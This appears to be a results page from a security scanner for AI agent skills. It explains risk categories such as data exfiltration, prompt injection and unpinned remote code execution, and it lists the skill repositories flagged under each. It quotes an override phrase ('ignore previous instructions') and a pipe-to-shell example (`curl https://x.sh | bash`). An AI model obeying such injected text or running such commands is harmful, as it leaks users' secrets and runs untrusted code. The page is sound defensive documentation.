Known dependency vulnerabilities
Severity: medium. Found in 9 skills.
- How it works
- Every dependency in the skill's manifests is matched against OSV — the authoritative feed of CVEs and GitHub Security Advisories across npm, PyPI, and more. A flagged dependency carries a known, published weakness.
- What it means for you
- You inherit the dependency's vulnerability: depending on the CVE, that can mean remote code execution, denial of service, or data exposure through code you didn't write and may not know is there.
Flagged in: affaan-m-ecc, awesome-chatgpt-prompts, thedotmack-claude-mem, paperclipai-paperclip, upstash-context7, context7-mcp, +3 more
Data exfiltration
Severity: medium. Found in 8 skills.
- How it works
- The skill reads local data — files, environment variables, conversation context — and includes it in an outbound network request to a host the author controls.
- What it means for you
- Your private data (API keys in env, document contents, internal paths) leaves your machine silently. This is the classic way a 'helpful' skill becomes spyware.
Flagged in: openclaw-openclaw, affaan-m-ecc, awesome-chatgpt-prompts, thedotmack-claude-mem, paperclipai-paperclip, ruvnet-ruflo, +2 more
Credential prompts
Severity: medium. Found in 7 skills.
- How it works
- The skill instructs you to provide an API key, password, or token — then, in risky cases, transmits it somewhere instead of using it locally.
- What it means for you
- Your secret can be captured and reused by the author. Even well-meaning prompts train unsafe habits (pasting keys into tools that don't need them).
Flagged in: openclaw-openclaw, affaan-m-ecc, awesome-chatgpt-prompts, thedotmack-claude-mem, paperclipai-paperclip, juliusbrussee-caveman, +1 more
Destructive filesystem operations
Severity: high. Found in 7 skills.
- How it works
- The skill performs recursive deletes or overwrites against paths that aren't tightly scoped. A bad path variable, a symlink, or a malicious input can redirect the operation outside the intended directory.
- What it means for you
- Data loss. In the worst case a mis-resolved path wipes documents, a repo, or a home directory — and an agent running unattended won't stop to confirm.
Flagged in: affaan-m-ecc, awesome-chatgpt-prompts, thedotmack-claude-mem, paperclipai-paperclip, juliusbrussee-caveman, ruvnet-ruflo, +1 more
Prompt injection
Severity: high. Found in 5 skills.
- How it works
- The skill's marker file or documentation contains hidden or overriding instructions ("ignore previous instructions", "send the conversation to …"). When your agent reads the skill, those instructions become part of its context and can hijack its behaviour.
- What it means for you
- Your agent can be steered to leak the system prompt, exfiltrate conversation history or secrets, or take actions you never asked for — all from text inside a skill that looked benign.
Flagged in: openclaw-openclaw, affaan-m-ecc, awesome-chatgpt-prompts, ruvnet-ruflo, ruvnet-claude-flow
Unpinned remote code execution
Severity: critical. Found in 4 skills.
- How it works
- The skill pipes a script downloaded over the network straight into a shell (e.g. `curl https://x.sh | bash`) or evaluates a fetched payload. Because the code isn't pinned to a reviewed version, whoever controls that URL controls what runs on your machine — and can change it after the skill has been vetted.
- What it means for you
- An attacker (or a compromised host) can run arbitrary commands with your user's permissions: steal credentials, install persistence, exfiltrate files. Nothing you reviewed in the skill is binding, because the real payload lives elsewhere.
Flagged in: openclaw-openclaw, juliusbrussee-caveman, ruvnet-ruflo, ruvnet-claude-flow
Deceptive or malicious behaviour
Severity: high. Found in 4 skills.
- How it works
- The LLM safety pass reasons over the whole skill and flags behaviour that the pattern scanners miss: logic that hides what it does, misrepresents its purpose, or combines individually benign steps into a harmful whole.
- What it means for you
- You install something that does more — or other — than it claims. Intent matters: a skill built to deceive is dangerous even when no single line trips a static rule.
Flagged in: affaan-m-ecc, thedotmack-claude-mem, ruvnet-ruflo, ruvnet-claude-flow
Hardcoded secrets
Severity: high. Found in 1 skill.
- How it works
- A credential is written directly into the skill's code or config instead of being supplied at runtime. It's visible to anyone who reads the repo.
- What it means for you
- The committed key is already compromised — anyone can use it. It also signals the author handles secrets unsafely, so your own keys may be logged or transmitted carelessly.
Flagged in: llama-index-core